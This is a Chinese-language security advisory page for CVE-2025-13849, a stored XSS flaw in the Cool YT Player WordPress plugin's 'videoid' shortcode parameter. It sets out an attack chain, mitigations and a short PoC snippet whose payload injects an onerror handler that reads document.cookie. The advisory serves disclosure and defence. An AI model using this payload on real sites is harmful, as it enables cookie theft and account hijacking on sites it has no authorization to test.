IPBUF安全漏洞报告
English
CVE-2025-13849 CVSS 6.4 中危

CVE-2025-13849 WordPress Cool YT Player插件存储型XSS漏洞

披露日期: 2026-01-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-13849
漏洞类型
存储型跨站脚本攻击(XSS)
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Cool YT Player plugin for WordPress

相关标签

存储型XSSWordPress插件漏洞Cool YT PlayerCVE-2025-13849跨站脚本攻击认证用户攻击输入验证不足WordPress安全

漏洞概述

CVE-2025-13849是WordPress Cool YT Player插件中的一个存储型跨站脚本(XSS)漏洞。该插件是一款用于在WordPress网站上嵌入YouTube视频的流行插件。漏洞源于插件对用户输入的'videoid'参数缺乏充分的输入清理和输出转义处理。攻击者通过利用此漏洞,可以在包含该插件渲染内容的页面中注入任意JavaScript脚本。由于是存储型XSS,恶意脚本会被永久保存在数据库中,所有访问受影响页面的用户都会自动执行这些恶意代码。此漏洞需要攻击者具有至少Contributor级别的WordPress用户权限即可实施攻击。

技术细节

漏洞位于Cool YT Player插件的youtube_video_wrapper.php文件第58行附近。插件直接将从'videoid'参数接收的用户输入未经过滤就输出到HTML页面。具体来说,当用户提交包含恶意JavaScript代码的videoid值时,插件没有对其进行适当的HTML实体编码或输入验证,导致攻击者可以构造类似<script>alert(document.cookie)</script>的payload并成功存储。当其他用户访问包含该视频ID的页面时,浏览器会将其解析为可执行脚本并执行。攻击者可利用此漏洞窃取会话Cookie、劫持用户账户、执行钓鱼攻击或传播恶意软件。由于该插件被广泛使用,此漏洞可能影响大量WordPress网站。

攻击链分析

STEP 1
步骤1
攻击者获得WordPress网站的Contributor级别或更高权限账户
STEP 2
步骤2
攻击者创建或编辑文章/页面,插入包含恶意payload的Cool YT Player短代码
STEP 3
步骤3
恶意payload(如:onerror="javascript:alert(document.cookie)")被保存到数据库,由于插件未进行输入验证和输出转义
STEP 4
步骤4
受害者访问包含恶意短代码的页面,浏览器解析HTML时执行注入的JavaScript脚本
STEP 5
步骤5
攻击者通过JavaScript获取受害者的Cookie、会话令牌或其他敏感信息,可能导致账户劫持

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// CVE-2025-13849 PoC - Stored XSS in Cool YT Player WordPress Plugin // Requires Contributor-level access or higher // Step 1: Identify the vulnerable parameter // The 'videoid' parameter in the shortcode is vulnerable // Step 2: Inject malicious JavaScript payload // Using the shortcode: [cool-yt-player videoid="XSS_PAYLOAD"] // Example PoC payload: const xssPayload = '" onerror="javascript:alert(document.cookie)" data-xss="'; // Step 3: Craft the malicious shortcode const maliciousShortcode = `[cool-yt-player videoid="${xssPayload}"]`; // Step 4: The payload will be stored and executed when page is accessed // Example of how the vulnerable code might process the input: // In youtube_video_wrapper.php: // echo '<iframe src="https://www.youtube.com/embed/' . $videoid . '"></iframe>'; // Without sanitization, the payload becomes: // <iframe src="https://www.youtube.com/embed/" onerror="javascript:alert(document.cookie)" data-xss=""></iframe>

影响范围

Cool YT Player plugin <= 1.0 (所有版本)

防御指南

临时缓解措施
如果无法立即升级插件,可采取以下临时缓解措施:1) 暂时禁用Cool YT Player插件并使用其他替代方案;2) 限制具有编辑权限的用户账户;3) 部署内容安全策略(CSP)头部限制脚本执行;4) 使用WordPress安全插件如Wordfence进行入侵检测;5) 审查所有使用该插件的页面内容,移除可疑的videoid值。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表